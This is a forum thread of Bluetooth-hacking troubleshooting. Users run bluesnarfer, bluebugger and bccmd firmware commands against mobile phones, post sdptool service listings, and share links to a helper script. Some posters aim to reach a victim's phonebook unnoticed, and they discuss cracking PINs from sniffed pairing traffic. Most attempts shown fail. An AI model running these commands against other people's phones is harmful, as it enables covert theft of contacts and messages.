Anybody having issues with the bluetooth sniffing guide could you post your outputs here and I will take a look.



mkdir bluesniff
cd bluesniff
hciconfig hci0 revision >> verson.txt
bccmd pslist -s 0x000f >> 0x000f-out.txt
bccmd pslist -s 0x0000 >> 0x0000-out.txt
bccmd pslist -s 0x0001 >> 0x0001-out.txt
bccmd pslist -s 0x0002 >> 0x0002-out.txt
bccmd pslist -s 0x0004 >> 0x0004-out.txt
bccmd pslist -s 0x0008 >> 0x0008-out.txt


Compress the bluesniff folder and upload to mediafire or something.

@ The_Denv Sounds like you have a ROM chipset.
@ spankdidly You have to flash the dongle with new firmware I will add to the post when I get time :D
@ jujuqka yes people have got this to work.

The_Denv
12-22-2007, 07:23 AM
@ The_Denv Sounds like you have a ROM chipset.


Doh!

Ah well, I hope I can find a dongle in the UK which has a RAM chipset. It never tells you on the packaging which is pathetic. So..of to Google I go.

Thanks for pointing out my problem Dr ;)

EDIT:
I found a page listing a few bluetooth devices which support firmware modifying and are of C.S.R. [Cambridge Silicon Radio] origin. Here is the link for people that also encounter this problem:

http://www.evilgenius.de/2007/04/10/bluetooth-dongle-with-csr-chipset-and-flash-or-external-memory-using-flash/ By the way this website has a LOT of useful comments on the article so please read them as they are seriously helpful.

For people wanting to Google for a Fujitsu Siemens CSR RAM bluetooth dongle here is the Manufacturers number for the specific model: S26361-F3214-L10

I Google'd the model number on my bluetooth device 'bc03rut1-01' and found that Dr_GrEen was right. Microdirect.co.uk stated the following:

[bc03rut1-01] Uses a BlueCore3-Rom chipset from a leading Bluetooth chipset supplier

So its a ROM alright :( ahh well. I'll have to buy a RAM one.

juststormy
12-22-2007, 12:34 PM
Anybody having issues with the bluetooth sniffing guide could you post your outputs here and I will take a look.


Thanks very much, that is great helping :-)

I uploaded it for you - hope you'll find the problem.

Thanks again very much!

http://rapidshare.de/files/38106128/juststormy.tar.html

drgr33n
12-22-2007, 04:06 PM
Hey juststormy

I've just had a look for you and it appears that the addresses you seek are in 0x0000.

If bccmd won't write to 0x0000 it may be a case of that those values are on the ROM.

try



bccmd psset -s 0x0000 0x02bf 0x0002


Just a warning, don't cut and paste here your x's will be wrong. Type it in your self.

juststormy
12-22-2007, 04:21 PM
Thanks Mr.Green,

i tryed it again, but appears the same error as before.

Can't execute command: No such device or address (6)

Any other ideas to get this dongle working or is it just impossible with this?

drgr33n
12-22-2007, 04:51 PM
Just a couple of things

first hciconfig -a revision was a typo you should be using



hciconfig hci* revision


Post the output here..

The second is are you enabling your adapter before you begin



hciconfig hci0 up


Last thing is to try to get the value of 0x02bf on different addresses.



bccmd psget -s 0x0000 0x02bf
bccmd psget -s 0x0001 0x02bf
bccmd psget -s 0x0002 0x02bf
bccmd psget -s 0x0004 0x02bf
bccmd psget -s 0x0008 0x02bf


If it can read the value from 0x0000 but cannot write you have problems if it cannot read that address I'm baffled:D

moviezman
12-23-2007, 03:56 PM
I'm very new to this
I got the following steps to work
Setting up your bluetooth equipment
Scanning and fingerprinting devices
Connectivity and RFCOMM
But then when i enter

this in bluebugger

bluebugger -c 7 -a 00:1D:28:19:23:2B info

I must then enter a code on my mobile because it asked for it so i enter the code 0000 because that's the standard code for my phone but when i enter it and accept it iget the following error in bluebugger

First i get this but that is normal
Target Device: '00:1D:28:19:23:2B'
Target Name: 'P1i'

And after i typed in 0000 i get the error
Cannot open '/dev/rfcomm0': Connection refused

how can i solve this problem

Is it the Rfcomm connection?

This is what my Sdptool browse looks like

Browsing 00:1D:28:19:23:2B ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
"AV Remote Target" (0x110c)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service Name: AVRCP Controller
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10001
Service Class ID List:
"AV Remote" (0x110e)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service Name: m-Router Connectivity
Service Description: m-Router Connectivity
Service Provider: Symbian Ltd.
Service RecHandle: 0x10002
Service Class ID List:
UUID 128: a2157972-3541-4d0b-a551-b3abe639f526
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100

Service Name: m-Router Connectivity
Service Description: m-Router Connectivity
Service Provider: Symbian Ltd.
Service RecHandle: 0x10003
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100

Service Name: SEMC HLA
Service RecHandle: 0x10004
Service Class ID List:
"" (0x8e771301)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 61689
"" (0x8e770300)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x8e771303)
Version: 0x0100

Service Name: Dial-up Networking
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x10005
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Audio Streaming Source
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x10007
Service Class ID List:
"Audio Source" (0x110a)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 25
"AVDTP" (0x0019)
uint16: 0x100
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Advanced Audio" (0x110d)
Version: 0x0100

Service Name: Headset Audio Gateway
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: Hands-free Audio Gateway
Service Description: Symbian OS,UIQ phone
Service Provider: Sony Ericsson
Service RecHandle: 0x1000b
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0105

Service Name: Object-push
Service RecHandle: 0x1000d
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: Bestandsoverdracht this is Dutch for file transfer
Service RecHandle: 0x1000e
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Personal Ad-hoc User Service
Service Description: Personal Ad-hoc User Service
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x1000f
Service Class ID List:
"PAN User" (0x1115)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 15
"BNEP" (0x000f)
Version: 0x0100
SEQ8: 0 6 dd
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"PAN User" (0x1115)
Version: 0x0100

Service Name: Group Ad-hoc Network Service
Service Description: Personal Group Ad-hoc Network Service
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10010
Service Class ID List:
"PAN Group Network" (0x1117)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 15
"BNEP" (0x000f)
Version: 0x0100
SEQ8: 0 6 dd
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"PAN Group Network" (0x1117)
Version: 0x0100

Service Name: Phonebook access PSE
Service Provider: Symbian Software Ltd
Service RecHandle: 0x10011
Service Class ID List:
"Phonebook Access - PSE" (0x112f)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x01
base_offset: 0x6a
Profile Descriptor List:
"Phonebook Access" (0x1130)
Version: 0x0100


As you can see the Dial is 7
File transfer is 5
Object push is 4

So i entered that in the Rfcomm

I am so confused what is good and bad please help what to do .

The_Denv
12-24-2007, 07:44 AM
That last post just caused me to have an OCD fit :P

Could you please edit it and insert the 'code' tags please?

Dr_GrEen, hows the pentesting coming on? Have you started yet because I think I read a few pages back that you actually haven't tried this yet?

It would be nice to start adding phone models [with manufacturer model code] to a vulnerability list within this thread on the first post ;) -- "one post to rule them all".

drgr33n
12-25-2007, 05:41 AM
@ moviesman Connection refused means your phone rejected the connection
@ The_Denv Yea Blue|track dev is slow at the mo it's Christmas :D but 1.0a will be ready v soon ;D V good idea about the phone list.! If we can get people to post I will add something to bluetrack too

On python script to stop all questions lol ;)

The_Denv
12-25-2007, 02:06 PM
@ moviesman Connection refused means your phone rejected the connection
@ The_Denv Yea Blue|track dev is slow at the mo it's Christmas :D but 1.0a will be ready v soon ;D V good idea about the phone list.! If we can get people to post I will add something to bluetrack too

On python script to stop all questions lol ;)

Happy days man, Christmas does slow things down. I read the other thread about the project your working on, pretty cool python script. I cant wait to try it out, great idea. Fast|Track is slick, so I can only guess what Blue|Track will be like :D

May the force be with you ¨_¨

rototo95
12-27-2007, 04:48 PM
Hi everybody,
i try to do use bluesnarfer tools, so I did:
mknod -m 666 /dev/bluetooth/rfcomm0 c 216 0

OBEX PUSH service is on channel 6

so, then I run:

#bluesnarfer -C 6 -i -b 00:1X:A4:XX:A2:XX
device name: V630i

And nothing happen.
When I sniff with hcidump, there is no activity.

Someone have an idea of the problem?

rototo95
12-27-2007, 05:07 PM
Hi everybody,

I try to use Bluesnarfer tool but I meet a problem

First, I create this device:

mknod -m 666 /dev/bluetooth/rfcomm0 c 216 0

With sdptool, I can see that OBEX Push Service is on channel 6

Then, I run bluesnarfer:

# bluesnarfer -r 1-10 -C 6 -b 00:1C:A4:C2:A2:D6
device name: V630i

Nothing else happen.
When I look with Hcidump, there is no more activity.

Someone have an idea?

taser
12-29-2007, 07:11 PM
ok i was wondering if i could get some help with this I am pretty sure that I have configored my usb bluetooth right but whenever that i run commands to my phone i always get errors like:


bt ~ # bluesnarfer -r l-100 -b 00:17:d5:e1:e2:55
bluesnarfer: hci_create_connection failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok

and
Cannot open '/dev/rfcomm0': Connection refused

any help would be helpfull

stasik
01-01-2008, 10:02 PM
i have the same results as taser. i checked my channels and every thing is ok. maybe it is important what type should be in rfcomm0? because after this result rfcomm0 is deleted. rfcomm1 never get executed..and another interesting thing: every time i execute the command, it asks on the phone (nokia 6310i) to accept or reject connection. then asks for password (1234) and i the the result mentioned above. isn't is suppose to be unnoticed?maybe the class should be changed to 0x50204??thanks in advance

unlazyfree
01-06-2008, 12:51 AM
ok i was wondering if i could get some help with this I am pretty sure that I have configored my usb bluetooth right but whenever that i run commands to my phone i always get errors like:


bt ~ # bluesnarfer -r l-100 -b 00:17:d5:e1:e2:55
bluesnarfer: hci_create_connection failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok

and
Cannot open '/dev/rfcomm0': Connection refused

any help would be helpfull

I have this exact problem, plus this output

bt ~ # bccmd psset -s 0x0000 0x02bf 0x0002
Unsupported manufacturer

EDIT: I didn't look closely, mine says Cannot open...Connection reset by peer

unlazyfree
01-06-2008, 12:52 AM
i have the same results as taser. i checked my channels and every thing is ok. maybe it is important what type should be in rfcomm0? because after this result rfcomm0 is deleted. rfcomm1 never get executed..and another interesting thing: every time i execute the command, it asks on the phone (nokia 6310i) to accept or reject connection. then asks for password (1234) and i the the result mentioned above. isn't is suppose to be unnoticed?maybe the class should be changed to 0x50204??thanks in advance

I tried changing my class to 0x50204 and still had the same problem

stasik
01-06-2008, 07:55 PM
did anyone get it working??? coz seems to me there is more questions than answers...

unlazyfree
01-07-2008, 07:46 AM
Actually I looked more closely and realized that my error says

cannot open /whatever/his/is. Connection RESET BY PEER, not refused.

Could that be because my phone is realizing what I'm trying to do?

medamarko
01-10-2008, 10:42 AM
I do everything from dr.green tutorial! BTScanner find my device with 00:1A:75:BF:88:9C adress, but thats all i can do, everithing else dont working! And I have the same problem like taser! I always get this:

bt ~ # bluesnarfer -i -b 00:1A:75:BF:88:9C
bluesnarfer: hci_create_connection failed
bluesnarfer: unable to get device name
bluesnarfer: open /dev/rfcomm0, Is a directory
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok

And when I try l2ping i get:

bt ~ # l2ping 00:1A:75:BF:88:9C
Can't connect: Operation already in progress

What should I do? Help?!

stasik
01-11-2008, 06:56 PM
i dont think u do anything wrong. my understanding is that all of this is connected to rfcomm.i tried and no luck,and i use nokia 6310i-very vulnerable. just hope for a different/another tutorial.

stlava
01-15-2008, 08:52 AM
I've been reading about bluetooth hacking. Now correct me if I'm wrong, and I think Dr_GrEeN would know, but the older cell phones are the most susceptible. From what I tried on my own phones and from reading it seems most modern cellphones (victims) prompt the user if they wish to accept an incoming connection. Which creates a problem.

Now can an attacker connect to a cellphone without having a pin? The reason why I ask is because I've read that when cellphones connect to their bluetooth headsets naturally everything is encrypted but from capturing traffic an attacker can gather enough to generate link key and then a pin... which then the traffic is now wide open the attacker has access to the phone and headset. Major problem is that generating the pin has to be done one a pico board otherwise the victim has to sit around all day.

Also I haven't used any of the software but I don't see a command line argument to enter the pin, am I missing something?

stasik
01-15-2008, 08:07 PM
stlava u r right about finding the key used between device and phone,but my understanding is u have to capture trafic during paring. but should work and with trafik after, like with wep. then with that trafic and mac of both devices u could get the pin. but y do u need it??? there was a video about recording a conversation when victim uses a bluetooth headset with carwhisper..
would be great to connect to a phone without any pin or notice of the victim. i have nokia 6310i, and after aasked pin, it desconects.
still in search for a solution. if some1 has any info,SHARE!!!

stlava
01-17-2008, 04:27 AM
@stasik What the carwhisper app does is basically checks to see what the bluetooth devices are and looks in a database to see if they match any of the known pin's which are commonly 0000 or 1234. Again not very useful if the key isn't default. But stasik, I think you and I are looking for the same thing. I believe you have to have the cellphone's pin to connect to it no matter what, with our without a headset.

stasik
01-17-2008, 07:48 PM
@stlava, i sold my belkin bluetooth and ordered linsys usb bluetooth since in every tutorial linksys is mentioned. maybe that is a key to the success. when i ll get it i ll try again all the tutorials.
i tutorial videos no one entered pin. i think u change the bluetooth.conf with some code which will not ask the key and will proceed. but for the start i dont mind to input key, i just wanna see the poxy phonebook on my pc...

unix_r00ter
01-20-2008, 10:24 PM
thanks, this helped me a LOT :)

drgr33n
01-21-2008, 06:54 PM
Sorry guys havent been around for a while been busy sounds like most of your problems are non vulnerable devices. Still working on bluetrack when I have time but if you would like to try my unfinished python script here is the link.

http://www.mediafire.com/download.php?9szy24mttby

Sets the hacks up for you.

stlava
01-21-2008, 09:53 PM
Which bluetooth modules actually have the ability to be flashed. I know the BlueCore-4 external but I'm looking for specific modules.

The_Denv
01-22-2008, 03:43 AM
Which bluetooth modules actually have the ability to be flashed. I know the BlueCore-4 external but I'm looking for specific modules.

The answer was already in this thread:


...<snip>...
I found a page listing a few bluetooth devices which support firmware modifying and are of C.S.R. [Cambridge Silicon Radio] origin. Here is the link for people that also encounter this problem:

http://www.evilgenius.de/2007/04/10/bluetooth-dongle-with-csr-chipset-and-flash-or-external-memory-using-flash/ By the way this website has a LOT of useful comments on the article so please read them as they are seriously helpful.

For people wanting to Google for a Fujitsu Siemens CSR RAM bluetooth dongle here is the Manufacturers number for the specific model: S26361-F3214-L10

I Google'd the model number on my bluetooth device 'bc03rut1-01' and found that Dr_GrEen was right. Microdirect.co.uk stated the following:

[bc03rut1-01] Uses a BlueCore3-Rom chipset from a leading Bluetooth chipset supplier

So its a ROM alright :( ahh well. I'll have to buy a RAM one.

Try to look for your answer rather than be lazy ;)... google that manufacturing code, even google your own one. That link has some seriously good comments and information you can read to achieve your goal. I myself am waiting for the £££ to buy one.

williamc
01-31-2008, 08:32 PM
I've searched the forums and found the following that have a CSR chipset and allow firmware modifying:

Linksys USBBT100 Rev 1
D-Link DBT-120 Rev C1
DELOCK 61478
A7 eb502-HCI
Fujitsu Siemens BLUETOOTH V2.0
Toshiba PA3455U-1BTM
Aircable Host XR
Cellink BTA-6030 Bluetooth Adapter

The adapter must allow flashing of the external memory, so finding the correct adapter is painstaking. There are numerous revisions and chipset changes. Also changes from BlueCore4-external to BlueCore-ROM will prevent flashing. If anyone knows of any others, please add them to the list. If you know where to buy any of the mentioned adapters (with correct revision #), post as well, as many are discontinued or not sold in the states. Thanks.

William

Natty Dreed
02-05-2008, 06:25 PM
I'm Dump

I followed some command's without know what they are

and I got a problem in windows

it's tell me turn on you're bluetooth device but it already ON

in linux it's have no problems

williamc
02-08-2008, 11:08 PM
If you need an adapter:
You can buy the DLink DBT-120 RevC1 at Fry's and Newegg.com.

I noticed a typo in alot of posts refering to psget as psset.

Finally, for those with the old Nokia phone, you can check out my old tutorial showing some exploits:
http://www.irongeek.com/i.php?page=videos/bluesnarf1

Looking foward to some more updates on this thread. Thanks Dr_Green!

William

drgr33n
02-14-2008, 06:42 AM
Hey Guys

Have you got your bluetooth dongles ready because here it is the software for backtrack to enable sniffing.

I've added it to Blue-Smash, just download and install and sniff away :D

Blue-Smash v1.0c (http://www.mediafire.com/?ewg9n5zjn5u)

Bluetooth Sniffing with Blue-Smash Video Tutorial / Demo (http://www.mediafire.com/?4t0chlyaaye)

Online Demo Vid (No Sound) (http://blip.tv/scripts/flash/showplayer.swf?enablejs=true&feedurl=http://drgr33n.blip.tv/rss&file=http://blip.tv/rss/flash/674924&showplayerpath=http://blip.tv/scripts/flash/showplayer.swf)


Enjoy :cool:

skindeep
02-17-2008, 07:02 PM
Any info on the limitations of these vulnerabilities on newer devices. Will these apps only exploit older devices as others have mentioned?

drgr33n
03-14-2008, 01:07 AM
Hey guys

Sorry to drag a old post up but I've been playing with the bluetooth dongles for a while now and I thought it would be nice to post the cheapest dongle I found with the BC04 EXT chipset.

EDIT

Sorry received dongles and they were broadcom :( Going back to my original Fujitsu-Siemens BLUETOOTH v2.0 dongle.


Any info on the limitations of these vulnerabilities on newer devices. Will these apps only exploit older devices as others have mentioned?

The only info I have is that bluetooth is in its honeymoon stages so you may find some devices are exploitable and some are not. I cant remember weather its the bluesnarfer or the bluebugger exploit was sucsessful on the nokia phones because of a undisclosed secret channel (17) that allowed unauthorised access to the phone.

These exploits will still be valid because if you can get the link key, you could connect to a piconet and spoof the mac addy of the slave device, then you would be able to attack the master.

With sorbo's tools its only a matter of time before we should get "opencsr" the open source firmware for the CSR chipsets. This should allow injection amongst other things :D

unix_r00ter
03-26-2008, 01:00 PM
great thread, thanks for the help :D 10/10

williamc
03-31-2008, 07:53 PM
I'm getting some errors with Bluesmash 1.0e

Checking to see if HCI device exists....
No Local Device Detected! Please check your hardware.
Maybe Try 'hciconfig hci*' up and restart Blue|Smash.

Blue|Smash will now exit!


However hci0 is up:


bt ~ # hciconfig -a
hci0: Type: USB
BD Address: 00:17:9A:2B:86:11 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:102 acl:0 sco:0 events:0 errors:0
TX bytes:24 acl:0 sco:0 commands:8 errors:0

drgr33n
04-01-2008, 12:51 AM
Hey Williamc

Its because your modded bt dongle is no longer recognized as a bluetooth adapter. You will need to use a normal bt dongle to run bluesmash or comment out the following around line 50 in the main program



##### Hardware Check #####

print "Checking to see if HCI device exists...."
try:
sock = bt.hci_open_dev()
results = bt.hci_inquiry(sock, duration=1, flush_cache=True)
print "Sucsess :D!"
except bt.error:
print """No Local Device Detected! Please check your hardware.
Maybe Try 'hciconfig hci*' up and restart Blue|Smash.

Blue|Smash will now exit!
"""
sys.exit(1)

##### End Hardware Check #####

hongman
04-07-2008, 07:06 PM
Hi guys

I have just started looking and playing with bluetooth hacks, and I have come across a few problems which I hope someone can help with.

My Bluetooth adapter of choice is the built in one in my Sony Vaio TR2MP.

hciconfig -a looks like this:


bt ~ # hciconfig -a
hci0: Type: USB
BD Address: 08:00:46:CC:9C:A1 ACL MTU: 192:8 SCO MTU: 64:8ss
RX bytes:673 acl:0 sco:0 events:19 errors:0
TX bytes:322 acl:0 sco:0 commands:19 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: ACCEPT MASTER
Name: 'device1'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x30d LMP Ver: 1.1 (0x1) LMP Subver: 0x30d
Manufacturer: Cambridge Silicon Radio (10)


I have followed the guide up until the firmware flashing part, where I kinda get lost.

I can use hcitool scan hci0

When I use bluebugger with
bluebugger -c 3 -a MAC info I can get the info, anything else and it prompts the phone with an authentication challenge. if I enter the passkey 1234 (set in my config) it says connection refused.

Soooo...in all the demos I see, it doesnt challenge for auth. Is this right?

Also noticed that although my device name is "device1" in the config, its using the computer name. Something isnt quite right.

I saw somewhere I have a BlueCore2-External chip if that helps. Please let me know if you need any further outputs, and/or what could be wrong.

Thanks

EDIT: Ok, let me update.

Using SDPTOOL I found out my Nokia uses DUN on 2, OPUSH on 9 and FTP on 11. If I use bluebugger on channel 2 and 11, I get prompted for a passkey (even if I put int the right one it doesnt work). If I use 9, the phone asks me if I want to receive a message. Clicking Yes results in nothing happening, no error or anything.

If I use Bluesnarfer, I get the same result as others here:

Bluesnarfer: open /dev/rfcomm0, Connection Refused
Bluesnarfer: bt_rfcomm_config failed
Bluesnarfer: unable to create rfcomm connection
Bluesnarfer: release rfcomm ok

Did anyine find out the fix for this?

drgr33n
04-08-2008, 06:19 PM
Hey hongman

You have to start your bluetooth services.



bash /etc/rc.d/rc.bluetooth start

hongman
04-08-2008, 06:28 PM
Hi Dr

It is started, for that I am sure becuase I can use sdptool browse Victim_MAC and return results.

My problem is:

When I use bluebugger or bluesnarfer it still prompts for a passkey. Entering 0000 or 1234 doesnt work and I get connection refused message, or it just hangs until I hit ctrl C.

I have yet to pull any phonebooks or messages or anything :(

I am testing on my Nokia E61, Blackberry Curve and Nokia N91.

Thanks in advance

drgr33n
04-09-2008, 01:19 AM
You can still use sdptool without your bluetooth services running. You will have to pair your PC to your phone to snarf a phonebook.

Can your phone see your PC ?

hongman
04-09-2008, 10:19 AM
You can still use sdptool without your bluetooth services running.

OH.

My phone cannot see my laptop. I tried using:

hcitool cc MAC
hcitool auth MAC

But on Auth I get an error. Let me boot my laptop up and I'll tell you what Im doing/not doing!

Thank you.

hongman
04-09-2008, 11:01 AM
OK.

Booted up BT3b.


hciconfig hci0 up
hciconfig -a
hci0: Type: USB
BD Address: 08:00:46:CC:9C:A1 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:79 acl:0 sco:0 events:8 errors:0
TX bytes:30 acl:0 sco:0 commands:8 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: ' '
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x30d LMP Ver: 1.1 (0x1) LMP Subver: 0x30d
Manufacturer: Cambridge Silicon Radio (10)


Can Scan OK.

bt ~ # hcitool scan hci0
Scanning ...
00:18:42:EA:56:11 Dave
00:1C:35:51:D1:5F English


Can use sdptool browse


bt ~ # sdptool browse 00:18:42:EA:56:11
Browsing 00:18:42:EA:56:11 ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
"AV Remote Target" (0x110c)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service RecHandle: 0x10001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1

Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: Imaging
Service RecHandle: 0x10005
Service Class ID List:
"Imaging Responder" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Imaging" (0x111a)
Version: 0x0100

Service Name: Audio Source
Service RecHandle: 0x10007
Service Class ID List:
"Audio Source" (0x110a)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 25
"AVDTP" (0x0019)
uint16: 0x100
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Advanced Audio" (0x110d)
Version: 0x0100

Service Name: SyncMLClient
Service RecHandle: 0x1000b
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000002-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x1000c
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 11
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Nokia OBEX PC Suite Services
Service RecHandle: 0x1000d
Service Class ID List:
UUID 128: 00005005-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 12
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005005-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SyncML DM Client
Service RecHandle: 0x1000e
Service Class ID List:
UUID 128: 00000004-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 13
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000004-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: Nokia SyncML Server
Service RecHandle: 0x1000f
Service Class ID List:
UUID 128: 00005601-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 14
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005601-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SIM Access
Service RecHandle: 0x10010
Service Class ID List:
"SIM Access" (0x112d)
"Generic Telephony" (0x1204)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"SIM Access" (0x112d)
Version: 0x0101

Service Name: Dial-Up Networking
Service RecHandle: 0x10018
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Hands-Free Audio Gateway
Service RecHandle: 0x10020
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Handsfree" (0x111e)
